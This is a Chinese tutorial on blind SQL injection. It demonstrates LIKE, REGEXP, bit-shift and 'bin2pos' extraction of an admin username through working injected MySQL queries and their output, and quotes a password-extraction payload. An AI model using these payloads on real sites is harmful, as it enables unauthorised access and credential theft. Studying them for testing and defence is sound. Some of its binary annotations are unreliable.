-> 盲注方法探究
1.二分法
這個不多說,大家都懂滴,啊D就是用的這種方法
速度: log2(N)
2.模糊匹配法
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'a%';
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adn%';
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adm%';
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'admin';
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> name = admin
3.正則匹配法
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[0-9]' ;
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-z]' ;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-h]' ;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-a]' ;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
======> name[0] = a
4.位推法
a(10) = 97
a(2) = 01100001
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>7)=0;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> 01100001 右移7位後 成爲 00000000
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>6)=0;
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>6)=1;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> 01100001 右移6位後 成爲 00000001
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>5)=2;
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>5)=3;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> 01100001 右移5位後 成爲 00000011
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=6;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=7;
Empty set (0.00 sec)
====> 01100001 右移4位後 成爲 00000110
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>3)=12;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>3)=13;
Empty set (0.00 sec)
====> 01100001 右移3位後 成爲 00001100
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>2)=24;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>2)=25;
Empty set (0.00 sec)
====> 01100001 右移2位後 成爲 00011000
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name f
rom ylmf_admin_user limit 1),1,1))>>1)=48;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>1)=49;
Empty set (0.00 sec)
====> 01100001 右移1位後 成爲 00110000
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>0)=96;
Empty set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>0)=97;
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> 01100001 右移0位後 成爲 00110001
====> name[0] = a
速度:固定爲7步了
5.bin2pos
前面那些都挺容易理解,而且大部分都知道,最後這個是我今天才看到的,挺奇葩的,名字我也不知道該咋個翻譯。。。而且我也不確定我想的和作者想的一樣
我就按照我的思路說吧。
作者給的語句:
IF((@a:=MID(BIN(POSITION(MID((SELECT password FROM users WHERE id=2 LIMIT 1),1,1)IN(CHAR(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70))),1,1))!=space(0),2-@a,0/0)
我整理的語句:
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),1,1),"abcdefghijklmno")),1,1),@i,0);
locate 和 position 功能是相近的,我就以locate來用了
(select name from ylmf_admin_user limit 1) 是我們的重點查詢語句
然後由mid((select name from ylmf_admin_user limit 1),1,1)來截取查詢結果的第1個字符
然後由(locate(mid((select name from ylmf_admin_user limit 1),1,1),"abcdefghijklmno")將查詢結果映射到字符串abcdefghijklmno中,判斷mid的結果所在位置,如a就是1
然後由bin()來把結果轉換爲二進制
然後由mid()來截取字符
然後賦值給@i
最後由if(expr, res1, res2)語句來判斷,我爸res1設爲@i是因爲@i的結果只有0,1這兩種結果
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>0,1,0);
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> (mid((select name from ylmf_admin_user limit 1),2,1) 有查到數據
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>2,1,0);
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>3,1,0);
Empty set (0.00 sec)
====> bin結果 共3位
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),1,1),@i,0);
+-------------------------+
| site_url |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
====> bin結果的 第1位 1
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),2,1),@i,0);
Empty set (0.00 sec)
====> bin結果的 第2位 0
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),3,1),@i,0);
Empty set (0.00 sec)
====> bin結果的 第3位 0 ====> bin結果 100 即 d
我爲什麼要映射到abcdefghijklmno上呢?因爲abcdefghijklmno長度爲15,bin(15)=1111,這樣好縮短bin結果長度的時間,如果(mid((select name from ylmf_admin_user limit 1),2,1)沒有數據,你由確定語句正確就替換abcdefghijklmno爲別的,如 ABCDEFGHIJKLMNO